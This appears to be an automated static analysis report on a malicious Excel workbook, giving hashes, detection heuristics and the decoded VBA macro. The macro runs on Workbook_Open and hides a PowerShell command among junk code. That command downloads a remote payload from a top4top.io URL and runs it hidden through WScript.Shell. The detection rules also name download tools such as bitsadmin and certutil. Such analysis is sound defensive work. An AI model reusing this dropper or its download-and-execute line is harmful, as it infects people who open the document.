Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf6f0919da868f1d…

MALICIOUS

Office (OOXML)

19.1 KB Created: 2021-03-18 14:41:37 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-04-01
MD5: d43a167cd3dec9b39d2cec9aea137176 SHA-1: b18ad7ac1be4be0d5a706c98f3bcf84f3e2319d7 SHA-256: bf6f0919da868f1d57b20a1458912bcabe92195c09a80264226177d8d31105d0
238 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
           End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs …
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_Open()
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
           End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs …
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://j.top4top.io/p_19039etez1.jpg In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7972 bytes
SHA-256: dafaf8f6e8a056f49457746a121a92692fa91b93994977e532b12aeb07fe71df
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
     ' rD Integer
    Dim vsanDtAknoVnGsXDQQeMdSTHncIfdM As CommandBarControl: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: With Application.CommandBars("List Range Popup"): With .Controls.Add(msoControlButton, 1, , 1, True): .Caption = "Pick &from Calendar": .OnAction = ThisWorkbook.Name & "!MUAPWchLUWozyECzIinwhQ": .BeginGroup = True: .Tag = "cRihUGMbRUAhIRwJXvYrMLvrFF": End With: End With:
' wAkDvLbvDyICFaNp
If Len(Trim(VcGfoAOMX)) Then
MsgBox "NoMCTVJeCMiLouQXwrnEtAIuGuEHDsFGpMYVHzs" & VcGfoAOMX, vbInformation
If coll.Count Then
ReDim AitQAHdAQJXrz(0 To coll.Count - 1, 0 To 3): For i = 1 To coll.Count: JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = Split(coll(i), sep): AitQAHdAQJXrz(i - 1, 0) = i: AitQAHdAQJXrz(i - 1, 1) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(1): AitQAHdAQJXrz(i - 1, 2) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(0): AitQAHdAQJXrz(i - 1, 3) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(2): Next i: SF.Caption = "FcJk """ & VcGfoAOMX & """": SF.Show: SF.ListBox_Search.List = AitQAHdAQJXrz: SF.TextBox_count.Text = coll.Count
Else: msg = "hcIWXDRQsAHSETTucodVeaoSNGyLSJV" & vbNewLine & _
"NcHKNChewpXBWHwdS """ & VcGfoAOMX & """ NcHKNChewpXBWHwdS «" & ActiveWorkbook.Name & "»"
MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP")
If Len(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue) > 0 Then
        If Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "\" Or Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "/" Then
            BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb"
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb": End If
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = "zXb": End If: sPathToIcon = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue
CreateIconFile_ERR:
nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI = nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI + 1: Dim fybEOtLOBnUnLMpaCLMHkMAtQEQF As Range: Dim WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV As String, uJQMUPvfFsabVFdnUWaveJzErEdyG As String: WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV = "dHiQEfbApBaiHvnvDMd": uJQMUPvfFsabVFdnUWaveJzErEdyG = "pWFKCZiaChDLbaTWXKdhyStUczsPFEtVEUfKCuZ"
If WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV <> uJQMUPvfFsabVFdnUWaveJzErEdyG Then
        ' zuSabCGAMooMrBLo
       End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf + UHLK + STfzrGLY + pteCF + " -noexit   -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://j.top4top.io/p_19039etez1.jpg')""": Set ukabYTObvArRTChfXAySPkGVtc = CreateObject("WScript.Shell"): ukabYTObvArRTChfXAySPkGVtc.Run tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa, 0: Dim QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH As String ' JkcBzUGsRtZiVYQDvkHKbkGd: Dim PUuikrrkbRfib As Integer: ' LJXWLHTFLfYzTOnerzZdSXIcFXBGOuuzQpeHHWy
For PUuikrrkbRfib = 1 To 10: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + CStr(PUuikrrkbRfib) ' PUuikrrkbRfib String
        If PUuikrrkbRfib = 5 Then Exit For
    Next PUuikrrkbRfib: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = Val("hwHMkseNUoABUoJK") ' XBuIsRNauUASuUkyO:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + 10:MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH:On Error Resume Next ' IJD:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0
    MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
    On Error Resume Next: Err.Clear
    Set FEFJOoUvDkTESPnAvFNw = CreateObject("scripting.filesystemobject")
    Set ukabYTObvArRTChfXAySPkGVtc = FEFJOoUvDkTESPnAvFNw.CreateTextFile(Filename, True)
    rXWLzQnbILKKzPXL.Write txt: rXWLzQnbILKKzPXL.Close
    SaveTXTfile = Err = 0
    Set ukabYTObvArRTChfXAySPkGVtc = Nothing: Set fso = Nothing

On Error GoTo Err ' DGdYXCutMbiGMbDN Err:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0:MsgBox "OK!"
Err:
    MsgBox "SySSdzkcQKnEQKGp!": On Error GoTo 0 ' TEKadYhUyHGzKXtH:' rXWLzQnbILKKzPXL
 ' rD Integer
Do While True
        Exit Do
  Loop 'While True
    Do 'Until False
        Exit Do
    Loop Until False
    ' AitQAHdAQJXrz.
   Dim VLeLtnOHWytXeovy(1 To 10, 5 To 6) As Integer: VLeLtnOHWytXeovy(1, 6) = 8: Dim tetrNhXNiCBkUfRC As New Collection: Dim fNevfSafvpnOPDse As Collection: tetrNhXNiCBkUfRC.Add "fPesfTafskyPRGAfIz", "IMnfOEJkR": Set fNevfSafvpnOPDse = tetrNhXNiCBkUfRC ' IMnfOEJkR Set:MsgBox fNevfSafvpnOPDse("IMnfOEJkR"):Set fNevfSafvpnOPDse = New Collection: MsgBox fNevfSafvpnOPDse.Count
On Error Resume Next: Err.Clear
  res = InputBox("zssSdfIaSEuLPZFSdzryoi", "FOOWNeKPWGCctVGaOMNFAdQbhGO")
    If VarType(res) = vbBoolean Then Exit Sub    ' zssSdfIaSEuLPZFSdzryoi
   Set ra = Range([A2], Range("A" & Rows.Count).End(xlUp))
    Application.ScreenUpdating = False
    ra.Font.Color = 0: ra.Font.Bold = 0
 For Each cell In ra.Cells
        pos = 1
        If cell.Text Like "*" & txt & "*" Then
            arr = Split(cell.Text, txt, , vbTextCompare)
            If UBound(arr) > 0 Then
                For Each v In arr
                    JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(v)    ' oYYNyfHuNCbrkcDJzfXuiuBhUnZ
                    With cell.Characters(JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK, Len(txt))
                        .Font.ColorIndex = 3    ' kniAUUWVrcSTFLusWMIUQn
                        .Font.Bold = True    'yIXPAUciwVyZYeziZnKXPrNdiyFSiCa
                    End With
                    JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(txt)
                Next v
            End If
        End If
    Next cell: On Error Resume Next: Colors = Array(FcJk, hcIWXDRQsAHSETTucodVeaoSNGyLSJV, ncHtDBAyeYoerrGUIsbznW, VcGfoAOMX, QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH, _
                   NcHKNChewpXBWHwdS): Err.Clear: Set FcJk = Intersect(Selection, ActiveSheet.UsedRange)
    If Err Then Exit Sub: FcJk.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
    For Each cell In ra.Cells: Err.Clear: If Len(Trim(cell)) Then coll.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value): If Err Then dupes.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value)
    Next cell: For Each cell In ra.Cells
        cell.Interior.Color = (CStr(cell.Value))
    'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH AitQAHdAQJXrz
    Next cell
    Application.ScreenUpdating = True
'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BFDED88D-3204-45F0-8F88-5C49B0D8A8EF}{03FA106A-845F-4E8F-A725-CD68E59EEC33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: fbdf0e97b4f5df5c2386fe8dd5e9f925a2870da633b885a16af728e830e1dea4